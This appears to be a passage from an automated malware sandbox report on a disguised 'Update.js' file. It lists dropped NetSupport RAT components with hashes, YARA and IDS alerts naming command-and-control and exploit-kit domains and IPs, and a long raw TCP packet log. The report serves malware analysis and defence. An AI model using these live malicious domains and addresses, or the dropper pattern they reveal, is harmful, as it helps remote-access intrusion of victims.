                                                                              SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exe

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):63864
                                                                              Entropy (8bit):6.446503462786185
                                                                              Encrypted:false
                                                                              SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                              MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                              SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                              SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                              SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                              Static File Info

                                                                              General

                                                                              File type:ASCII text, with very long lines (463)
                                                                              Entropy (8bit):5.094199232673068
                                                                              TrID:
                                                                                File name:Update.js
                                                                                File size:2'698'311 bytes
                                                                                MD5:44b73d7c14986000a0865aefb01bf02b
                                                                                SHA1:0f41ec94c405aa3e46b090a3ecda574cb01f17b3
                                                                                SHA256:82a6ea1721bb31929e77725f9bb6e4dc38719ce8d61a5633285aed7cd5260b40
                                                                                SHA512:710002980e208a5c061f543c1d36cc529ed8a1e3d6a2bfa39755a6c6fb4e883fd56ac6244715707619845098414e6d0007ee64965ff193aa93a1b57ea93247d4
                                                                                SSDEEP:49152:OCz4F9dM2furCz4F9dM2fu9Cz4F9dM2furCz4F9dM2fui:OkGgkGmkGgkG9
                                                                                TLSH:5BC5640879E3985CA52374799A7FE844B2354117E09EEED1B49CF9F00FA00744A7AE7E
                                                                                File Content Preview:(function() {. function r(e, n, t) {. function o(i, f) {. if (!n[i]) {. if (!e[i]) {. var c = "function" == typeof require && require;. if (!f && c) return c(i, !0);.

                                                                                File Icon

                                                                                Icon Hash:68d69b8bb6aa9a86

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-09-10T16:33:31.132514+02002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.6497355.181.159.137443TCP
                                                                                2024-09-10T16:33:38.861236+02002055795ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (moneymoj .com)1192.168.2.6647971.1.1.153UDP
                                                                                2024-09-10T16:33:39.408669+02002055798ET EXPLOIT_KIT ZPHP Domain in TLS SNI (moneymoj .com)1192.168.2.6497188.39.147.104443TCP
                                                                                2024-09-10T16:33:47.058328+02002055801ET MALWARE ZPHP CnC Domain in DNS Lookup (ipva2024-detransp .com)1192.168.2.6555881.1.1.153UDP
                                                                                2024-09-10T16:33:47.624783+02002055802ET MALWARE ZPHP CnC Domain in TLS SNI (ipva2024-detransp .com)1192.168.2.64973379.141.161.172443TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Sep 10, 2024 16:33:38.903247118 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:38.903285027 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:38.903512001 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:38.904902935 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:38.904917955 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.408507109 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.408668995 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.411076069 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.411086082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.411423922 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.460972071 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.472410917 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.519403934 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.629254103 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.636639118 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.636665106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.636708975 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.636765003 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.636765003 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.636779070 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.636797905 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.637742043 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.716725111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.716737032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.716772079 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.716794968 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.717264891 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.717264891 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.717284918 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.717538118 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.766181946 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.766236067 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.766597033 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.766597033 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.766616106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.766860962 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.801959991 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.802017927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.802064896 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.802084923 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.802598953 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.802598953 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.803795099 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.803812027 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.803968906 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.803987026 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.804172993 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.805195093 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.805212021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.806118965 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.806128025 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.807409048 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.851986885 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.852005005 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.852124929 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.852147102 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.852308035 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.852308035 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.888938904 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.888988972 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.889024019 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.889034986 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.889120102 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.889120102 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.889913082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.889957905 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.890012026 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.890021086 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.890079021 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.890460014 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.891616106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.891660929 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.891710997 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.891730070 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.891741037 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.892013073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.892790079 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.892834902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.892868042 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.892875910 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.893348932 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.893348932 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.893625021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.893704891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.893795013 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.893795013 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.893804073 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.894164085 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.897800922 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.897845984 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.897901058 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.897913933 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.899415016 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.899415016 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.938157082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.938173056 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.938446999 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.938467026 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.938659906 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.998409986 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.998434067 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.998522997 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.998536110 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.998581886 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.998720884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.998891115 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.998940945 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.998991013 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.998997927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.999053955 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.999409914 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.999492884 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.999535084 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.999629021 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.999629974 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.999663115 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.999665022 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.999717951 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.999718904 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.999718904 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:39.999747038 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:39.999798059 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.001215935 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.004669905 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.004741907 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.004786968 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.004792929 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.004892111 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.004892111 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.005234957 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.005289078 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.005337000 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.005342960 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.005426884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.005426884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.029090881 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.029109001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.029230118 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.029242039 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.029297113 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.062952042 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.062968969 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.063043118 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.063050985 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.063144922 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.063497066 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.063524961 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.063606977 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.063606977 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.063613892 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.063677073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.064321995 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.064363956 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.064424038 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.064424038 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.064429998 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.064482927 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.064888000 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.064970016 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.064979076 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.065006018 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.065048933 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.065080881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.065080881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.065447092 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.065488100 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.065507889 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.065546036 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.065551996 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.065630913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.066248894 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.066291094 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.066359997 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.066359997 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.066366911 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.066387892 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.066947937 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.067008972 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.067044973 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.067051888 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.067059040 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.067114115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.110585928 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.110630989 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.110670090 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.110682964 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.110727072 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.110727072 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.149291039 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.149305105 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.149380922 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.149390936 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.149462938 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.149641991 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.149657965 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.149710894 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.149725914 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.149811029 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.150147915 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.150161028 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.150255919 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.150262117 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.150310993 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.150645971 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.150659084 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.150717020 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.150723934 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.150918007 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.151335001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.151357889 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.151426077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.151432037 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.151475906 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.151875019 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.151890993 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.151958942 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.151967049 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.152017117 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.152103901 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.152117968 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.152206898 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.152206898 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.152215004 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.152256966 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.196578979 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.196623087 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.196732998 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.196732998 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.196749926 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.196893930 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.243011951 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243027925 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243113041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.243129015 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243232965 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.243321896 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243340015 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243398905 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.243407965 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243431091 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.243443012 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.243681908 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243695021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243814945 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.243822098 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.243901014 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.244002104 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244014978 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244092941 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.244102001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244155884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.244587898 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244601965 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244690895 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.244698048 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244790077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.244868994 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244883060 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.244968891 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.244973898 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.245018005 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.245382071 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.245397091 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.245450974 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.245456934 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.246269941 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.246269941 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.285101891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.285161018 CEST443497188.39.147.104192.168.2.6
